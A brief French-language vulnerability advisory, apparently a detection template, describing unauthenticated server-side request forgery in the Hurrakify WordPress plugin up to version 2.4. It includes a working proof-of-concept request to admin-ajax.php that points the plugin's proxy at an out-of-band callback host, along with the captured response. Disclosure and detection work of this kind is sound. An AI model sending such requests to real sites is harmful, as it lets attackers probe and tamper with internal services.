
Hurrakify <= 2.4 - Falsification de requête côté serveur non authentifiée
Hurrakify <= 2.4 - Falsification de requête côté serveur non authentifiée
Le plugin Hurrakify pour WordPress présente une vulnérabilité de falsification de requête côté serveur dans toutes les versions jusqu'à la 2.4 incluse. Cela permet à des attaquants non authentifiés d'envoyer des requêtes web vers des emplacements arbitraires à partir de l'application web, ce qui peut servir à interroger et à modifier des informations de services internes.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>